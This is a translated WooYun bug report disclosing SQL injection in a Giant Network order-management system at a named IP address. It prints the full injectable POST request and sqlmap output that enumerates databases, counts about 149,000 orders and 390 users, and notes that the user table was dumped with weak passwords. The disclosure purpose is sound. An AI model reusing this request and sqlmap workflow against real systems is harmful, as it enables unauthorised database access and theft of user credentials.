Vulnerability summary

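Bug ID: wooyun-2016-0169054

Title: POST injection vulnerability in a Giant Network (巨人网络) system (can affect the security of 150,000 orders + 400 users)

Vendor: Giant Network

Author: 牛 小 帅

Submitted: 2016-01-11 11:56

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]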


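Vulnerability details

Disclosure status:

2016-01-11: Details reported to the vendor, awaiting vendor handling
2016-01-11: Vendor confirmed; details disclosed to the vendor only
2016-01-21: Details disclosed to core white hats and experts in related fields
2016-01-31: Details disclosed to regular white hats
2016-02-10: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public

Brief description:

Do I need to declare this a repost?
This noob is copying an expert's vulnerability: http://www.wooyun.org/bugs/wooyun-2015-0161906
SQL injection resulting from a weak password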

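Detailed description:

As already stated in the description:
The injection points are not even the same one, yet I was told this is a duplicate. I read every published vulnerability carefully; there are piles of duplicates, SVN leaks, existing webshells and so on, and I'm speechless.
http://222.73.243.217/
The query function has a POST injection (look at the parameter carefully)

The expert's parameter:

222.73.243.217/syswork/carryon/carryonshow.php?act=manage&carryonid=35468


My parameter is listorder:
The POST request is here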

POST /syswork/statistics/order_standard_list.php HTTP/1.1
Host: 222.73.243.217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.73.243.217/syswork/statistics/order_standard_list.php
Cookie: PHPSESSID=bess3o040r75dsr9cssnpb49s4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2502

__EVENTTARGET=btsearch&__EVENTARGUMENT=%B2%E9%D1%AF&__VIEWSTATE=[base64 value omitted]&cbkselected=&listOrderType=&listOrderTypeDetail=0&deptCode=1&pageselect=1


[11:48:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[11:48:41] [INFO] fetching current user
[11:48:41] [INFO] resumed: uYW4Y7N27EDVL@10.240.31.6
current user: 'uYW4Y7N27EDVL@10.240.31.6'


available databases [2]:
[*] information_schema
[*] mobilecsms


[11:47:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[11:47:34] [INFO] resumed: 149141
Database: mobilecsms
+----------+---------+
| Table | Entries |
+----------+---------+
| cs_order | 149141 |
+----------+---------+


web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[11:47:19] [INFO] resumed: 390
Database: mobilecsms
+------------+---------+
| Table | Entries |
+------------+---------+
| basic_user | 390 |
+------------+---------+


There are several hundred more users than can be shown here; over 70% of users use the password 1 or 123456 (meaning already decrypted)

[11:20:42] [INFO] Table 'mobilecsms.basic_user' dumped to CSV file 'E:\sqlmap\sqlmap\Bin\output\222.73.243.217\dump\mobilecsms\basic_user.csv'
[11:20:42] [INFO] Fetched data logged to text files under 'E:\sqlmap\sqlmap\Bin\output\222.73.243.217'

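Proof of vulnerability:

Dear vendor, the impact is large. I did not dump the orders for you; if I don't prove it a little, the reviewers say I plagiarized.

Fix:

Copyright notice: when reposting, please credit the source 牛 小 帅@WooYun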


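Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-01-11 18:05

Vendor reply:

Thank you for your attention; remediation has been requested

Latest status:

None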


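Vulnerability comments:

Comments

  1. 2016-01-11 11:59 | 我的邻居王婆婆 (Regular white hat | Rank: 2981 Vulnerabilities: 506 | Just found a good bug and the site went down)

    Brother Niu is mighty

  2. 2016-01-11 12:00 | 牛 小 帅 (Regular white hat | Rank: 1071 Vulnerabilities: 250 | 1. The most handsome man on WooYun ...)

    @我的邻居王婆婆 Things should be fair, right? What's most infuriating is being wrongly accused. I had planned a sequel, there is one more injection, but I can't be bothered to submit it; I've lost the mood.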